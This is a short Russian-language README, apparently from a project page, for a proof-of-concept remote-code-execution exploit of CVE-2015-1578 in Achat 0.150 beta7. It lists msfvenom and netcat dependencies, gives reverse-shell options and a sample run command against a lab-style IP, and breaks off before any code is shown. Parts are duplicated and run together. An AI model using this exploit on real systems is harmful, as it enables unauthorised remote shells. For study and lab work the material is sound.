
Это эксплойт концепции доказательства для CVE-2015-1578 — уязвимости переполнения буфера в Achat 0.150 beta7 на Windows. Эксплуатация приводит к удалённому выполнению кода через специально сформированный UDP-пакет.
Это PoC-эксплойт для CVE-2015-1578, уязвимости переполнения буфера в Achat 0.150 beta7 на Windows. Эксплуатация приводит к удалённому выполнению кода с помощью специально сформированного UDP-пакета.
Этот PoC задуман как чистый, минимальный и хорошо структурированный пример разработки эксплойтов. Он демонстрирует:
msfvenommsfvenom (часть Metasploit Framework)rlwrap (для улучшенного использования Netcat)msfvenomrlwrap nc-i <target_ip> IP-адрес цели (обязательно)
-l, --lhost <listener_ip> Локальный IP-адрес для обратной оболочки (обязательно)
-p, --lport <port> Локальный порт для обратной оболочки (обязательно)
--rport <port> Удалённый UDP-порт цели (по умолчанию: 9256)
python3 chatter.py -i 10.10.10.74 -l 10.10.16.7 -p 9393
Это позволит: